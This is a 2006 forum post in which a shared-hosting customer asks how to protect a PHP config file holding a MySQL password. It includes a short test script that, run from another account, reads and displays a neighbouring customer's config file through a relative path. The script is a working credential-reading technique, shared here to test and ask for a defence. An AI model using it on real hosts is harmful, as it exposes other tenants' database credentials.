haaglin
November 18th, 2006, 12:39 PM
Hi.
Not sure if this is a programming issue or server issue, but I'm looking for a good way of protecting my config files that contain MySQL passwords from being read by other customers on the same host that I use. As a test I made a config file and uploaded it under my user. Then I used another account to upload a script to read the file.
To explain further, here is an example:
www.domain1.com:
Code:
root: /var/www/web1/web/
file: /var/www/web1/web/config/constants.php
constants.php:
<?php
define("MYSQL_PASS","123456789");
?>
www.domain2.com:
root: /var/www/web2/web/
file: /var/www/web2/web/test.php
test.php:
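<?php
// Resolve the path to the other customer's config file, relative to this script's directory
$filename = realpath("../../web1/web/config/constants.php");
// Open the file as plain text and read it in full instead of executing it
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
// Show the raw PHP source, including the password constant
echo '<textarea name="textareaName" rows="46" cols="103">'.$contents.'</textarea>';
?>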
And I was able to read the file. Is this a host security issue, or can I do something to prevent reading?
I tried to deny world read access, but then Apache didn't have access to it. This is a huge security issue for me.